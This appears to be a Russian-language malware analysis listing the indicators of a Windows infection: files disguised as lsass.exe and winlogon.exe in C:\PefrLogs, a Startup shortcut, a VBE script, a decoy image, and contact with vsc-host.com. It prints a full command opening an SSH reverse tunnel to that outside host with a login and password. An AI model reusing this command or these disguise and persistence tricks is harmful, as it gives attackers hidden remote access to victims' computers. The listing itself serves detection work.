Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk
- 'C:\PefrLogs\lsass.exe' -ssh -R 34844:127.0.0.1:8293 -N vsc-host.com -l viscolul -pw gogoasa2011
- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p8293 -a
- '<SYSTEM32>\wscript.exe' //B //Nologo GoogleIndexer.vbe
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen <Текущая директория>\IMG_983773988398.jpg
- %HOMEPATH%\Recent\bf32d3b0.lnk
- %HOMEPATH%\Recent\IMG_983773988398.lnk
- <LS_APPDATA>\PUTTY.RND
- C:\PefrLogs\ReaderUpdate.lnk
- <Текущая директория>\IMG_983773988398.jpg
- C:\PefrLogs\winlogon.exe
- <Текущая директория>\Interop.IWshRuntimeLibrary.dll
- C:\PefrLogs\GoogleIndexer.vbe
- C:\PefrLogs\lsass.exe
- 'vs###ost.com':22
- DNS ASK vs###ost.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'ShImgVw:CPreviewWnd' WindowName: ''